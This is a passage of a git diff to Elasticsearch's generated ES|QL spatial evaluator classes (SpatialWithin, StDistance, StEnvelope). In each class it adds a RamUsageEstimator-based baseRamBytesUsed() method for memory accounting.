import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java index 032e20003c788..b31efe9b051d6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java index 3df427c4e03f4..7fbb157491142 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java index ebbef2086182b..24369d61f20ad 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java index eacce4c73d714..6fb51c160c67c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java index 06666a4cfe8b0..5bccc68c1a866 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java index 7fdba8dfecf1d..d15673952dc24 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java index 54488302c7487..649c9005060be 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialWithinGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java index f1ebad92bea1a..6195786300371 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock leftBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java index 3af1fa1f990b8..9106036859cd7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -50,6 +53,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java index 08d882b0b2cf2..2f2f88ecb5fbd 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java index b29915ff22c7e..910f4a6ba81fb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -50,6 +53,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java index fc042e0f31c13..31b727dff6655 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock leftBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java index 7e68261503800..4980fcc3d5969 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java index 44e7b49ded915..26c3662cbd9f9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java index 3bf5b1499ebe7..2799510889a59 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StDistanceGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java index ca79afe188d09..c10b9378d4a8f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StEnvelopeFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StEnvelopeFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StEnvelopeFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java 